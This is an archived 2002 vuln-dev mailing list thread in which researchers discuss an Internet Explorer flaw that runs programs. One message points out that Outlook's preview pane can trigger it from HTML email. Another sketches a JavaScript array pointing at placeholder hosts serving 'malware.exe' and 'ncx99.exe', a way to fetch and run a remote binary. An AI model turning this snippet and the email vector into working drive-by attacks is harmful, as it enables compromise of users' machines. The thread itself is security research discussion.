RE: Rather large MSIE-hole

From: Chad Thunberg (chadth@nologin.org)
Date: 03/15/02


From: "Chad Thunberg" <chadth@nologin.org>
To: "KF" <dotslash@snosoft.com>, <vuln-dev@security-focus.com>
Date: Thu, 14 Mar 2002 22:35:58 -0800

This is not limited to a user visiting a webpage. Outlook and Outlook
Express execute client side code in email per the IE settings assigned. A
user doesn't even have to open the HTML formatted email with the JS or this
XML code embedded if they are using a preview pane. Also, if you look at
the codebase and the functions surrounding it, you will realize that passing
additional parameters separated by any type of space will not work.
However, using this in conjunction with other methods and transports can be
very powerful.

-Chad

-----Original Message-----
From: KF [mailto:dotslash@snosoft.com]
Sent: Thursday, March 14, 2002 2:48 PM
To: vuln-dev@security-focus.com
Subject: Re: Rather large MSIE-hole

Another thought... will this bug run an executable from a web page? If
so you could just make your own binary to do whatever you wanted. Like
http://mysiteathome.com/malware.exe or something along those lines. I
would HOPE that it asks to save the file to disk or even better ignore
it altogether. Maybe try something like:

var programName=new Array(
    'http://mysiteathome.com/ncx99.exe',
    'http://someothersite.com/ncx99.exe',
);

I would do this myself but I don't have any Windows boxen to test.
-KF

Paul D. Campbell wrote:

>>Could you not create a batch file that housed the commands you wanted
>>to run
>>(with args) and just run the batch file?
>>I apologise if someone has already addressed this.
>>
>>-Eric
>>
>
>You would probably be able to do this. However, you would first need
>to place the batch file on the target machine. Then you would have to
>sit around and hope the user visits your malicious site. Though, if
>you have the capability to write to someone's hard drive you could do
>something much nastier than this :)
>
>Paul
>
>


